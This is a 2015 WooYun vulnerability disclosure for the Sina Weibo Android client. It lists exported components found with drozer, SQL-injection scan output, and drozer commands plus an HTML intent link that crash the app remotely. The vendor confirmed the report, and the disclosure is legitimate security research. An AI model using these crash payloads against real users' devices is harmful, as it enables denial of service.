当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120198

漏洞标题:新浪微博Android客户端漏洞打包(设计缺陷/拒绝服务/敏感信息泄露/SQL注入)

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2015-06-15 11:29

修复时间:2015-09-15 17:22

公开时间:2015-09-15 17:22

漏洞类型:用户敏感数据泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认,细节仅向厂商公开
2015-06-20: 细节向第三方安全合作伙伴开放
2015-08-11: 细节向核心白帽子及相关领域专家公开
2015-08-21: 细节向普通白帽子公开
2015-08-31: 细节向实习白帽子公开
2015-09-15: 细节向公众公开

简要描述:

醉了,求打雷

详细说明:

### 客户端信息,最新版本:v5.3.0

0.JPG


### 设计缺陷,大量组件暴露,增加风险面,那么多组件是否都有必要exported=true?

dz> run app.package.attacksurface com.sina.weibo
Attack Surface:
103 activities exported
15 broadcast receivers exported
1 content providers exported
14 services exported
dz>


Activity:

dz> run app.activity.info -a com.sina.weibo
Package: com.sina.weibo
com.sina.weibo.MainTabActivity
com.sina.weibo.composerinde.ComposerDispatchActivity
com.sina.weibo.photoalbum.PhotoAlbumActivity
com.sina.weibo.SwitchUser
com.tencent.tauth.AuthActivity
com.sina.weibo.FbBindActivity
com.sina.weibo.UserLoginOverseaActivity
com.sina.weibo.MessageGroupManageActivity
com.sina.weibo.MessageAtMeActivity
com.sina.weibo.MessageCommentActivity
com.sina.weibo.weiyou.DMMessageBoxActivity
com.sina.weibo.weiyouinterface.DMMessageBoxPreLoadingActivity
com.sina.weibo.weiyouinterface.WeiyouDispatchActivity
com.sina.weibo.HomeListActivity
com.sina.weibo.page.SearchResultActivity
com.sina.weibo.WeiboCommonListActivity
com.sina.weibo.FavoriteActivity
com.sina.weibo.page.ProfileInfoActivity
com.sina.weibo.page.UserInfoDetailActivity
com.sina.weibo.page.UserWeiboAttentionFansList
com.sina.weibo.ImageViewer
com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
com.sina.weibo.exlibs.WeiboBrowserPreLoading
com.sina.weibo.PayCommonForwardActivity
com.sina.weibo.PayOrderInfoLoderActivity
com.sina.weibo.PayOrderActivity
com.sina.weibo.PayBankcardManageActivity
com.sina.weibo.PayFinishedAcitivity
com.sina.weibo.DetailWeiboActivity
com.sina.weibo.LoadingActivity
com.sina.weibo.LocalSearch
com.sina.weibo.SplashActivity
com.sina.weibo.EditorDialogActivity
com.sina.weibo.NavigateViewPageActivity
com.sina.weibo.NearByPeopleNavigator
com.sina.weibo.SSOActivity
com.sina.weibo.SSOAccountListActivity
com.sina.weibo.ChooseContactsActivity
com.sina.weibo.page.EditGroupActivity
com.sina.weibo.GetFriendActivity
com.sina.weibo.NearByActivity
com.sina.weibo.page.ShakeActivity
com.sina.weibo.page.EditChannelActivity
com.sina.weibo.page.FragmentPageActivity
com.sina.weibo.page.ChannelDetailInfoActivity
com.sina.weibo.sync.activity.ContactsSyncActivity
com.sina.weibo.QRCodeActivity
com.sina.weibo.DraftBox
com.sina.weibo.page.CardLikeListActivity
com.sina.weibo.page.CardMblogListActivity
com.sina.weibo.page.CardProductListActivity
com.sina.weibo.page.CardPicListActivity
com.sina.weibo.page.CardInfoListActivity
com.sina.weibo.page.CardUserListActivity
com.sina.weibo.MyThemeActivity
com.sina.weibo.MyWeiboTailActivity
com.sina.weibo.LuckyBagActivity
com.sina.weibo.InstallActionActivity
com.sina.weibo.NewRegistHomeActivity
com.sina.weibo.NewFillInfoActivity
com.sina.weibo.NewInterestPeopleActivity
com.sina.weibo.qrcode.CaptureActivity
com.sina.weibo.PageActivity
com.sina.weibo.page.PageDetailActivity
com.sina.weibo.PageDiscussActivity
com.sina.weibo.page.CardListActivity
com.sina.weibo.page.AlipayCardListActivity
com.sina.weibo.GroupFriendGuideActivity
com.sina.weibo.appmarketinterface.AppMarketActivityDispatcher
com.sina.weibo.appmarket.activity.AppInfoActivity
com.sina.weibo.appmarket.sng.activity.SngMainActivity
com.sina.weibo.appmarket.sng.activity.SngGameDetailActivity
com.sina.weibo.appmarket.sng.activity.SngGameManagerActivity
com.sina.weibo.appmarket.sng.activity.SngMessageListActivity
com.sina.weibo.appmarket.sng.activity.SngMessageDetailActivity
com.sina.weibo.appmarket.sng.activity.SngGiftBagListActivity
com.sina.weibo.appmarket.sng.activity.SngGameGiftBagListActivity
com.sina.weibo.appmarket.sng.activity.SngGiftBagDetailActivity
com.sina.weibo.appmarket.sng.activity.SngGameCategoryActivity
com.sina.weibo.appmarket.sng.activity.SngGameWebViewActivity
com.sina.weibo.appmarket.sng.activity.SngHtml5GameContainerActivity
com.sina.weibo.appmarket.sng.activity.SngEgretGameActivity
com.taobao.tae.sdk.alipaypro.AuthCallbackActivity
com.taobao.tae.sdk.alipaypro.AuthCallbackActivityBrowser
com.sina.weibo.FriendCircleMembersAddActivity
com.sina.weibo.FriendRecommendActivity
com.sina.weibo.media.player.MusicPlayerActivity
com.sina.weibo.page.MyFollowersActivity
com.sina.weibo.page.MyGroupFollowActivity
com.sina.weibo.GroupChatFansGroupActivity
com.sina.weibo.ChristmasEggActivity
com.sina.weibo.BrowserShareActivity
com.sina.weibo.wbc.CameraActivity
com.sina.weibo.GroupChatChooseActivity
com.sina.weibo.GroupChatForwardActivity
com.sina.weibo.GroupListActivity
com.sina.weibo.RadarActivity
com.sina.weibo.radar.RadarMainActivity
com.sina.weibo.radar.RadarTVActivity
com.sina.weibo.hc.HealthHomeActivity
com.sina.weibo.hc.HealthRankListActivity
com.sina.weibo.hc.tracking.ShareTrackActivity
com.sina.weibo.hc.HealthPermissionChoiceActivity


Broadcast:

dz> run app.broadcast.info -a com.sina.weibo
Package: com.sina.weibo
Receiver: com.sina.weibo.bundlemanager.WBExportedBroadcastDeliver
Receiver: com.sina.weibo.gowidget.GoWidgetProvider
Receiver: com.sina.weibo.BootCompletedReceiver
Receiver: com.alipay.mobile.command.trigger.NotifyTrigger
Receiver: com.sina.weibo.push.SDKMsgReceiver
Receiver: com.sina.push.receiver.ProxyReceiver
Receiver: com.sina.weibo.push.PackageReceiver
Receiver: com.sina.push.receiver.PushSDKReceiver
Receiver: com.sina.weibo.sdk.internal.SdkRegisterReceiver
Receiver: com.sina.weibo.wlan.WifiBusinessReceiver
Receiver: com.sina.weibo.push.PushNotificationReceiver
Receiver: com.sina.weibo.localpush.LocalPushReceiver
Receiver: com.sina.weibo.SwitchStateReceiver
Receiver: com.xiaomi.push.service.receivers.NetworkStatusReceiver
Receiver: com.sina.weibo.push.mi.MIUIMessageReceiver


Service:

dz> run app.service.info -a com.sina.weibo
Package: com.sina.weibo
com.sina.weibo.gowidget.GoWidgetProvider$GoWidgetKeepLiveService
Permission: null
com.sina.weibo.sendqueue.SendQueueService
Permission: null
com.sina.weibo.business.WeiboService
Permission: null
com.sina.weibo.business.DownloadManager
Permission: null
com.sina.weibo.business.ImageUtilService
Permission: null
com.sina.weibo.business.RemoteSSOService
Permission: null
com.sina.weibo.appmarket.service.AppMarketService
Permission: null
com.sina.weibo.push.PushServiceProxy
Permission: null
com.sina.push.service.SinaPushService
Permission: com.sina.permission.SINA_PUSH
com.sina.weibo.sdk.internal.SdkIdentityService
Permission: null
com.sina.weibo.sync.contact.ContactsSyncService
Permission: null
com.sina.weibo.sync.AuthenticationService
Permission: null
com.xiaomi.mipush.sdk.PushMessageHandler
Permission: null
com.sina.weibo.hc.tracking.manager.TrackingService
Permission: null


Provider:

dz> run app.provider.info -a com.sina.weibo
Package: com.sina.weibo
Authority: com.sina.weibo.sdkProvider
Read Permission: null
Write Permission: null
Content Provider: com.sina.weibo.datasource.SinaWeiboSdkProvider
Multiprocess Allowed: False
Grant Uri Permissions: False


#### 向某些暴露的组件发送空的intent,导致weibo客户端Crash
暴露组件太多,只是尝试了其中一部分activity,发现多个存在问题的组件(其余的请自行排查),如下

com.sina.weibo.weiyou.DMMessageBoxActivity
com.sina.weibo com.sina.weibo.ImageViewer
com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
com.sina.weibo.exlibs.WeiboBrowserPreLoading


2.JPG


部分崩溃日志:

3.JPG


4.JPG


POC:

dz> run app.activity.start --component com.sina.weibo com.sina.weibo.weiyou.DMMessageBoxActivity
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.ImageViewer
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.exlibs.WeiboBrowserPreLoading


或者IntentScheme远程利用:

<a href="intent:#Intent;component=cn.com.sina.weibo/com.sina.weibo.weiyou.DMMessageBoxActivity;end">触发漏洞</a><br>


#### Logcat调试信息,泄露敏感内容

1.JPG


#### 本地配置文件,敏感信息泄露

6.JPG


7.JPG


8.JPG


#### 还有一个本地SQL注入

dz> run scanner.provider.injection -a com.sina.weibo
Scanning com.sina.weibo...
Not Vulnerable:
content://com.sina.weibo.picListProvider/query_picinfo
content://mms-sms/conversations/
content://telephony/apgroups/
content://com.lenovo.launcher.badge/lenovo_badges/
content://com.sina.weibo.picListProvider/query_status
content://com.sina.weibo.userlog/pushinitlog/
content://com.sina.weibo.picListProvider/query_size
content://com.sina.weibo.userlog/netlog
content://com.android.contacts/
content://com.huawei.android.launcher.settings/badge/
content://com.sina.weibo.userlog/netlog/
content://com.android.contacts
content://com.sina.weibo.blogProvider/
content://com.sina.weibo.userlog/pushinitlog
content://com.sina.weibo.userlog/
content://com.sina.weibo.userlog
content://com.android.launcher2.settings/favorites?notify=true/
content://com.sina.weibo.blogProvider/home/
content://com.android.launcher2.settings/favorites?notify=true
content://com.sina.weibo.picListProvider/query_picinfo/
content://com.sina.push.pushprovider.1004/
content://com.sina.weibo.sdkProvider
content://com.sina.weibo.picListProvider/query_status/
content://com.lenovo.launcher.badge/lenovo_badges
content://com.sina.weibo.picListProvider/query_size/
content://com.sina.weibo.sdkProvider/
content://telephony/apgroups
content://com.sina.weibo.blogProvider/home
content://com.huawei.android.launcher.settings/badge
content://com.sina.weibo.picListProvider/
content://sms/inbox/
content://downloads/public_downloads/
content://com.sina.weibo.picListProvider
content://mms-sms/conversations
content://com.sina.weibo.spProvider
content://com.android.launcher.settings/favorites?notify=true
content://sms
content://com.sina.weibo.spProvider/
content://downloads/public_downloads
content://com.android.launcher.settings/favorites?notify=true/
content://sms/
content://sms/inbox
content://com.sina.weibo.blogProvider
content://com.sina.push.pushprovider.1004
Injection in Projection:
content://telephony/carriers
content://telephony/carriers/preferapn/
content://telephony/carriers/
content://telephony/carriers/preferapn
Injection in Selection:
content://telephony/carriers
content://telephony/carriers/preferapn/
content://telephony/carriers/
content://telephony/carriers/preferapn


5.JPG

漏洞证明:

见详细说明

修复方案:

1. 那么多exported=true的组件,重新设计一下吧
2. 发布版本关闭调试输出
3. 组件应正确处理异常intent
4. SQL注入。。。
。。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-17 17:21

厂商回复:

感谢对新浪安全的支持,已通知相关业务

最新状态:

暂无